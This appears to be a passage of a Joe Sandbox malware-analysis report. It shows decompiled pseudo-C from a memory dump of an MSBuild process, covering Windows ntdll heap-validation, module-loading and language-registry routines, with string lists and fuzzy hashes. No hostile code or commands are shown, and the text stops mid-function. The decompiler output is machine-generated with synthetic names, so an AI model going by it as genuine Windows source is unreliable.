                                            • API String ID: 0-1340214556
                                            • Opcode ID: a814f54f140e8db4c8319a7a43e7daf9570c17c4a91e6748c85c89cccec30cb9
                                            • Instruction ID: f5cd271a2ec85591ba95988b34b10e70540af95bf9961b475d449ddf9b8cda1a
                                            • Opcode Fuzzy Hash: a814f54f140e8db4c8319a7a43e7daf9570c17c4a91e6748c85c89cccec30cb9
                                            • Instruction Fuzzy Hash: 1881F431700684EFE726DB68C888BAABBF8FF45714F0445A5E5C2CB692D774E940CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0102B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				void* _t72;
                                            				char _t76;
                                            				signed char _t77;
                                            				intOrPtr* _t80;
                                            				unsigned int _t85;
                                            				signed int* _t86;
                                            				signed int _t88;
                                            				signed char _t89;
                                            				intOrPtr _t90;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t111;
                                            				void* _t117;
                                            				intOrPtr* _t118;
                                            				signed int _t120;
                                            				signed char _t121;
                                            				intOrPtr* _t123;
                                            				signed int _t126;
                                            				intOrPtr _t136;
                                            				signed int _t139;
                                            				void* _t140;
                                            				signed int _t141;
                                            				void* _t147;
                                            
                                            				_t111 = _a4;
                                            				_t140 = __ecx;
                                            				_v8 = __edx;
                                            				_t3 = _t111 + 0x18; // 0x0
                                            				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                            				_t5 = _t111 - 8; // -32
                                            				_t141 = _t5;
                                            				 *(_t111 + 0x14) = _a8;
                                            				_t72 = 4;
                                            				 *(_t141 + 2) = 1;
                                            				 *_t141 = _t72;
                                            				 *((char*)(_t141 + 7)) = 3;
                                            				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                            				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                            					_t76 = (_t141 - __edx >> 0x10) + 1;
                                            					_v12 = _t76;
                                            					__eflags = _t76 - 0xfe;
                                            					if(_t76 >= 0xfe) {
                                            						_push(__edx);
                                            						_push(0);
                                            						E010CA80D(_t134, 3, _t141, __edx);
                                            						_t76 = _v12;
                                            					}
                                            				} else {
                                            					_t76 = 0;
                                            				}
                                            				 *((char*)(_t141 + 6)) = _t76;
                                            				if( *0x10f8748 >= 1) {
                                            					__eflags = _a12 - _t141;
                                            					if(_a12 <= _t141) {
                                            						goto L4;
                                            					}
                                            					_t101 =  *[fs:0x30];
                                            					__eflags =  *(_t101 + 0xc);
                                            					if( *(_t101 + 0xc) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                            					E0100B150();
                                            					__eflags =  *0x10f7bc8;
                                            					if(__eflags == 0) {
                                            						E010C2073(_t111, 1, _t140, __eflags);
                                            					}
                                            					goto L3;
                                            				} else {
                                            					L3:
                                            					_t147 = _a12 - _t141;
                                            					L4:
                                            					if(_t147 != 0) {
                                            						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                            					}
                                            					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                            						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                            						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                            					}
                                            					_t135 =  *(_t111 + 0x14);
                                            					if( *(_t111 + 0x14) == 0) {
                                            						L12:
                                            						_t77 =  *((intOrPtr*)(_t141 + 6));
                                            						if(_t77 != 0) {
                                            							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                            						} else {
                                            							_t117 = _t140;
                                            						}
                                            						_t118 = _t117 + 0x38;
                                            						_t26 = _t111 + 8; // -16
                                            						_t80 = _t26;
                                            						_t136 =  *_t118;
                                            						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                            							_push(_t118);
                                            							_push(0);
                                            							E010CA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                            						} else {
                                            							 *_t80 = _t136;
                                            							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                            							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                            							 *_t118 = _t80;
                                            						}
                                            						_t120 = _v8;
                                            						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                            						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                            						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                            						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                            						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                            							__eflags =  *(_t140 + 0xb8);
                                            							if( *(_t140 + 0xb8) == 0) {
                                            								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                            								__eflags = _t88 - 2;
                                            								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                            								__eflags =  *0x10f8720 & 0x00000001;
                                            								_t89 = _t88 & 0xffffff00 | ( *0x10f8720 & 0x00000001) == 0x00000000;
                                            								__eflags = _t89 & _t121;
                                            								if((_t89 & _t121) != 0) {
                                            									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                            								}
                                            							}
                                            						}
                                            						_t85 =  *(_t111 + 0x14);
                                            						if(_t85 >= 0x7f000) {
                                            							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                            						}
                                            						_t86 = _a16;
                                            						 *_t86 = _t141 - _a12 >> 3;
                                            						return _t86;
                                            					} else {
                                            						_t90 = E0102B8E4(_t135);
                                            						_t123 =  *((intOrPtr*)(_t90 + 4));
                                            						if( *_t123 != _t90) {
                                            							_push(_t123);
                                            							_push( *_t123);
                                            							E010CA80D(0, 0xd, _t90, 0);
                                            						} else {
                                            							 *_t111 = _t90;
                                            							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                            							 *_t123 = _t111;
                                            							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                            						}
                                            						_t139 =  *(_t140 + 0xb8);
                                            						if(_t139 != 0) {
                                            							_t93 =  *(_t111 + 0x14) >> 0xc;
                                            							__eflags = _t93;
                                            							while(1) {
                                            								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                            								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                            									break;
                                            								}
                                            								_t126 =  *_t139;
                                            								__eflags = _t126;
                                            								if(_t126 != 0) {
                                            									_t139 = _t126;
                                            									continue;
                                            								}
                                            								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                            								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                            								break;
                                            							}
                                            							E0102E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                            						}
                                            						goto L12;
                                            					}
                                            				}
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: fefa884bd0ec67aa64245f457a7ce36b3748d07e79ba58268379137a96958176
                                            • Instruction ID: 5637b52f5550680a98f288efce737a2c8fc29ea6627f29d11f1a4975362fbb83
                                            • Opcode Fuzzy Hash: fefa884bd0ec67aa64245f457a7ce36b3748d07e79ba58268379137a96958176
                                            • Instruction Fuzzy Hash: 8B61D270600255DFDB69CF28C485BAABBE1FF44704F1885AEE8898F242D770E891CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E01017E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				char _v24;
                                            				signed int _t73;
                                            				void* _t77;
                                            				char* _t82;
                                            				char* _t87;
                                            				signed char* _t97;
                                            				signed char _t102;
                                            				intOrPtr _t107;
                                            				signed char* _t108;
                                            				intOrPtr _t112;
                                            				intOrPtr _t124;
                                            				intOrPtr _t125;
                                            				intOrPtr _t126;
                                            
                                            				_t107 = __edx;
                                            				_v12 = __ecx;
                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                            				_t124 = 0;
                                            				_v20 = __edx;
                                            				if(E0101CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                            					_t112 = _v8;
                                            				} else {
                                            					_t112 = 0;
                                            					_v8 = 0;
                                            				}
                                            				if(_t112 != 0) {
                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                            						_t124 = 0xc000007b;
                                            						goto L8;
                                            					}
                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                            					 *(_t125 + 0x34) = _t73;
                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                            						goto L3;
                                            					}
                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                            					_t124 = E0100C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                            					if(_t124 < 0) {
                                            						goto L8;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                            						L8:
                                            						return _t124;
                                            					}
                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                            							goto L5;
                                            						}
                                            						_t102 =  *0x10f5780; // 0x0
                                            						if((_t102 & 0x00000003) != 0) {
                                            							E01085510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                            							_t102 =  *0x10f5780; // 0x0
                                            						}
                                            						if((_t102 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            						_t124 = 0xc0000428;
                                            						goto L8;
                                            					}
                                            					L5:
                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                            						goto L8;
                                            					}
                                            					_t77 = _a4 - 0x40000003;
                                            					if(_t77 == 0 || _t77 == 0x33) {
                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                            						if(E01027D50() != 0) {
                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            						} else {
                                            							_t82 = 0x7ffe0384;
                                            						}
                                            						_t108 = 0x7ffe0385;
                                            						if( *_t82 != 0) {
                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01027D50() == 0) {
                                            									_t97 = 0x7ffe0385;
                                            								} else {
                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t97 & 0x00000020) != 0) {
                                            									E01087016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            						}
                                            						if(_a4 != 0x40000003) {
                                            							L14:
                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                            							if(E01027D50() != 0) {
                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							} else {
                                            								_t87 = 0x7ffe0384;
                                            							}
                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01027D50() != 0) {
                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t108 & 0x00000020) != 0) {
                                            									E01087016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            							goto L8;
                                            						} else {
                                            							_v16 = _t125 + 0x24;
                                            							_t124 = E0103A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                            							if(_t124 < 0) {
                                            								E0100B1E1(_t124, 0x1490, 0, _v16);
                                            								goto L8;
                                            							}
                                            							goto L14;
                                            						}
                                            					} else {
                                            						goto L8;
                                            					}
                                            				}
                                            			}

                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 01069898
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01069891
                                            • minkernel\ntdll\ldrmap.c, xrefs: 010698A2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: 5f3800086f1b6c057f0eb229e6faa86c042f22584e816c2d891f1d79d2d6571d
                                            • Instruction ID: 2a650e823e0e9b06a8a64225504c136ebd022369cc7fbcb4e2de385e867c450a
                                            • Opcode Fuzzy Hash: 5f3800086f1b6c057f0eb229e6faa86c042f22584e816c2d891f1d79d2d6571d
                                            • Instruction Fuzzy Hash: 8551F231A04746DFEB22CB6CC944B6A7BE8BB08314F540599E9D19BBD5D738ED00CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E010B23E3(signed int __ecx, unsigned int __edx) {
                                            				intOrPtr _v8;
                                            				intOrPtr _t42;
                                            				char _t43;
                                            				signed short _t44;
                                            				signed short _t48;
                                            				signed char _t51;
                                            				signed short _t52;
                                            				intOrPtr _t54;
                                            				signed short _t64;
                                            				signed short _t66;
                                            				intOrPtr _t69;
                                            				signed short _t73;
                                            				signed short _t76;
                                            				signed short _t77;
                                            				signed short _t79;
                                            				void* _t83;
                                            				signed int _t84;
                                            				signed int _t85;
                                            				signed char _t94;
                                            				unsigned int _t99;
                                            				unsigned int _t104;
                                            				signed int _t108;
                                            				void* _t110;
                                            				void* _t111;
                                            				unsigned int _t114;
                                            
                                            				_t84 = __ecx;
                                            				_push(__ecx);
                                            				_t114 = __edx;
                                            				_t42 =  *((intOrPtr*)(__edx + 7));
                                            				if(_t42 == 1) {
                                            					L49:
                                            					_t43 = 1;
                                            					L50:
                                            					return _t43;
                                            				}
                                            				if(_t42 != 4) {
                                            					if(_t42 >= 0) {
                                            						if( *(__ecx + 0x4c) == 0) {
                                            							_t44 =  *__edx & 0x0000ffff;
                                            						} else {
                                            							_t73 =  *__edx;
                                            							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                            								_t73 = _t73 ^  *(__ecx + 0x50);
                                            							}
                                            							_t44 = _t73 & 0x0000ffff;
                                            						}
                                            					} else {
                                            						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x10f874c ^ __ecx;
                                            						if(_t104 == 0) {
                                            							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                            						} else {
                                            							_t76 = 0;
                                            						}
                                            						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                            					}
                                            					_t94 =  *((intOrPtr*)(_t114 + 7));
                                            					_t108 = _t44 & 0xffff;
                                            					if(_t94 != 5) {
                                            						if((_t94 & 0x00000040) == 0) {
                                            							if((_t94 & 0x0000003f) == 0x3f) {
                                            								if(_t94 >= 0) {
                                            									if( *(_t84 + 0x4c) == 0) {
                                            										_t48 =  *_t114 & 0x0000ffff;
                                            									} else {
                                            										_t66 =  *_t114;
                                            										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                            											_t66 = _t66 ^  *(_t84 + 0x50);
                                            										}
                                            										_t48 = _t66 & 0x0000ffff;
                                            									}
                                            								} else {
                                            									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x10f874c ^ _t84;
                                            									if(_t99 == 0) {
                                            										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                            									} else {
                                            										_t69 = 0;
                                            									}
                                            									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                            								}
                                            								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                            							} else {
                                            								_t85 = _t94 & 0x3f;
                                            							}
                                            						} else {
                                            							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                            						}
                                            					} else {
                                            						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                            					}
                                            					_t110 = (_t108 << 3) - _t85;
                                            				} else {
                                            					if( *(__ecx + 0x4c) == 0) {
                                            						_t77 =  *__edx & 0x0000ffff;
                                            					} else {
                                            						_t79 =  *__edx;
                                            						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                            							_t79 = _t79 ^  *(__ecx + 0x50);
                                            						}
                                            						_t77 = _t79 & 0x0000ffff;
                                            					}
                                            					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                            				}
                                            				_t51 =  *((intOrPtr*)(_t114 + 7));
                                            				if(_t51 != 5) {
                                            					if((_t51 & 0x00000040) == 0) {
                                            						_t52 = 0;
                                            						goto L42;
                                            					}
                                            					_t64 = _t51 & 0x3f;
                                            					goto L38;
                                            				} else {
                                            					_t64 =  *(_t114 + 6) & 0x000000ff;
                                            					L38:
                                            					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                            					L42:
                                            					_t35 = _t114 + 8; // -16
                                            					_t111 = _t110 + (_t52 & 0x0000ffff);
                                            					_t83 = _t35 + _t111;
                                            					_t54 = E0105D4F0(_t83, 0xfe6c58, 8);
                                            					_v8 = _t54;
                                            					if(_t54 == 8) {
                                            						goto L49;
                                            					}
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push(_t111);
                                            					_push(_v8 + _t83);
                                            					E0100B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            						 *0x10f6378 = 1;
                                            						asm("int3");
                                            						 *0x10f6378 = 0;
                                            					}
                                            					_t43 = 0;
                                            					goto L50;
                                            				}
                                            			}

                                            Strings
                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 010B256F
                                            • HEAP: , xrefs: 010B255C
                                            • HEAP[%wZ]: , xrefs: 010B254F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                            • API String ID: 0-3815128232
                                            • Opcode ID: 1b9051d4bbcc7f3513f2f1e6cb14c65d4a836f03fa253a2bd5068d9029c4bdac
                                            • Instruction ID: 37e5a840e75ae3818b2b501d78aa5f8afc49914dd3573c8b140727a6880a948a
                                            • Opcode Fuzzy Hash: 1b9051d4bbcc7f3513f2f1e6cb14c65d4a836f03fa253a2bd5068d9029c4bdac
                                            • Instruction Fuzzy Hash: 4E511634100250CAE3B5DE1EC8C47F67BF1EB48645F554899E9C28BA85DB3EF846DB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0100E620(void* __ecx, short* __edx, short* _a4) {
                                            				char _v16;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				char* _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v44;
                                            				signed int _v48;
                                            				intOrPtr _v52;
                                            				void* _v56;
                                            				void* _v60;
                                            				char _v64;
                                            				void* _v68;
                                            				void* _v76;
                                            				void* _v84;
                                            				signed int _t59;
                                            				signed int _t74;
                                            				signed short* _t75;
                                            				signed int _t76;
                                            				signed short* _t78;
                                            				signed int _t83;
                                            				short* _t93;
                                            				signed short* _t94;
                                            				short* _t96;
                                            				void* _t97;
                                            				signed int _t99;
                                            				void* _t101;
                                            				void* _t102;
                                            
                                            				_t80 = __ecx;
                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                            				_t96 = __edx;
                                            				_v44 = __edx;
                                            				_t78 = 0;
                                            				_v56 = 0;
                                            				if(__ecx == 0 || __edx == 0) {
                                            					L28:
                                            					_t97 = 0xc000000d;
                                            				} else {
                                            					_t93 = _a4;
                                            					if(_t93 == 0) {
                                            						goto L28;
                                            					}
                                            					_t78 = E0100F358(__ecx, 0xac);
                                            					if(_t78 == 0) {
                                            						_t97 = 0xc0000017;
                                            						L6:
                                            						if(_v56 != 0) {
                                            							_push(_v56);
                                            							E010495D0();
                                            						}
                                            						if(_t78 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                            						}
                                            						return _t97;
                                            					}
                                            					E0104FA60(_t78, 0, 0x158);
                                            					_v48 = _v48 & 0x00000000;
                                            					_t102 = _t101 + 0xc;
                                            					 *_t96 = 0;
                                            					 *_t93 = 0;
                                            					E0104BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                            					_v36 = 0x18;
                                            					_v28 =  &_v44;
                                            					_v64 = 0;
                                            					_push( &_v36);
                                            					_push(0x20019);
                                            					_v32 = 0;
                                            					_push( &_v64);
                                            					_v24 = 0x40;
                                            					_v20 = 0;
                                            					_v16 = 0;
                                            					_t97 = E01049600();
                                            					if(_t97 < 0) {
                                            						goto L6;
                                            					}
                                            					E0104BB40(0,  &_v36, L"InstallLanguageFallback");
                                            					_push(0);
                                            					_v48 = 4;
                                            					_t97 = L0100F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                            					if(_t97 >= 0) {
                                            						if(_v52 != 1) {
                                            							L17:
                                            							_t97 = 0xc0000001;
                                            							goto L6;
                                            						}
                                            						_t59 =  *_t78 & 0x0000ffff;
                                            						_t94 = _t78;
                                            						_t83 = _t59;
                                            						if(_t59 == 0) {
                                            							L19:
                                            							if(_t83 == 0) {
                                            								L23:
                                            								E0104BB40(_t83, _t102 + 0x24, _t78);
                                            								if(L010143C0( &_v48,  &_v64) == 0) {
                                            									goto L17;
                                            								}
                                            								_t84 = _v48;
                                            								 *_v48 = _v56;
                                            								if( *_t94 != 0) {
                                            									E0104BB40(_t84, _t102 + 0x24, _t94);
                                            									if(L010143C0( &_v48,  &_v64) != 0) {
                                            										 *_a4 = _v56;
                                            									} else {
                                            										_t97 = 0xc0000001;
                                            										 *_v48 = 0;
                                            									}
                                            								}
                                            								goto L6;
                                            							}
                                            							_t83 = _t83 & 0x0000ffff;
                                            							while(_t83 == 0x20) {
                                            								_t94 =  &(_t94[1]);
                                            								_t74 =  *_t94 & 0x0000ffff;
                                            								_t83 = _t74;
                                            								if(_t74 != 0) {
                                            									continue;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L23;
                                            						} else {
                                            							goto L14;
                                            						}
                                            						while(1) {
                                            							L14:
                                            							_t27 =  &(_t94[1]); // 0x2
                                            							_t75 = _t27;
                                            							if(_t83 == 0x2c) {
                                            								break;
                                            							}
                                            							_t94 = _t75;
                                            							_t76 =  *_t94 & 0x0000ffff;
                                            							_t83 = _t76;
                                            							if(_t76 != 0) {
                                            								continue;
                                            							}
                                            							goto L23;
                                            						}
                                            						 *_t94 = 0;
                                            						_t94 = _t75;
                                            						_t83 =  *_t75 & 0x0000ffff;
                                            						goto L19;
                                            					}
                                            				}
                                            			}


                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0100E68C
                                            • InstallLanguageFallback, xrefs: 0100E6DB
                                            • @, xrefs: 0100E6C0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                            • API String ID: 0-1757540487
                                            • Opcode ID: 714c9e69ea9fbad6de4f003d4fdf86d1fa06ac3636c1b2a3141f39ef804d75fa
                                            • Instruction ID: b13d63b6a729ac2748b451a51edf67d5972131159d0b8a4d8da5fad1062e46c7
                                            • Opcode Fuzzy Hash: 714c9e69ea9fbad6de4f003d4fdf86d1fa06ac3636c1b2a3141f39ef804d75fa
                                            • Instruction Fuzzy Hash: D05194B15043469BD715DF68C880AABB7E8BF98754F0509AEF9C5E7240FB34D904C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E0102B8E4(unsigned int __edx) {
                                            				void* __ecx;
                                            				void* __edi;
                                            				intOrPtr* _t16;
                                            				intOrPtr _t18;
                                            				void* _t27;
                                            				void* _t28;
                                            				unsigned int _t30;
                                            				intOrPtr* _t31;
                                            				unsigned int _t38;
                                            				void* _t39;
                                            				unsigned int _t40;
                                            
                                            				_t40 = __edx;
                                            				_t39 = _t28;
                                            				if( *0x10f8748 >= 1) {
                                            					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                            					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                            						_t18 =  *[fs:0x30];
                                            						__eflags =  *(_t18 + 0xc);
                                            						if( *(_t18 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                            						E0100B150();
                                            						__eflags =  *0x10f7bc8;
                                            						if(__eflags == 0) {
                                            							E010C2073(_t27, 1, _t39, __eflags);
                                            						}
                                            					}
                                            				}
                                            				_t38 =  *(_t39 + 0xb8);
                                            				if(_t38 != 0) {
                                            					_t13 = _t40 >> 0xc;
                                            					__eflags = _t13;
                                            					while(1) {
                                            						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                            						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                            							break;
                                            						}
                                            						_t30 =  *_t38;
                                            						__eflags = _t30;
                                            						if(_t30 != 0) {
                                            							_t38 = _t30;
                                            							continue;
                                            						}
                                            						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                            						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                            						break;
                                            					}
                                            					return E0102AB40(_t39, _t38, 0, _t13, _t40);
                                            				} else {
                                            					_t31 = _t39 + 0x8c;
                                            					_t16 =  *_t31;
                                            					while(_t31 != _t16) {
                                            						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                            						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                            							return _t16;
                                            						}
                                            						_t16 =  *_t16;
                                            					}
                                            					return _t31;
                                            				}
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: dc97faacde67038b6c4591355c2a2bb9ebf15d02f87a9970c07876f98420ef3b
                                            • Instruction ID: cb54dec72d772c894a34fb58cd42b1f1a61af0a6715fd8a7cf2f8e5db923519d
                                            • Opcode Fuzzy Hash: dc97faacde67038b6c4591355c2a2bb9ebf15d02f87a9970c07876f98420ef3b
                                            • Instruction Fuzzy Hash: 1E112631714516DFE729D719C480BB9B7A5EF90B20F14806DE0CACB291D670D840CB45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E010CE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v40;
                                            				char _v44;
                                            				intOrPtr _v48;
                                            				signed int _v52;
                                            				unsigned int _v56;
                                            				char _v60;
                                            				signed int _v64;
                                            				char _v68;
                                            				signed int _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				char _t87;
                                            				signed int _t90;
                                            				signed int _t94;
                                            				signed int _t100;
                                            				intOrPtr* _t113;
                                            				signed int _t122;
                                            				void* _t132;
                                            				void* _t135;
                                            				signed int _t139;
                                            				signed int* _t141;
                                            				signed int _t146;
                                            				signed int _t147;
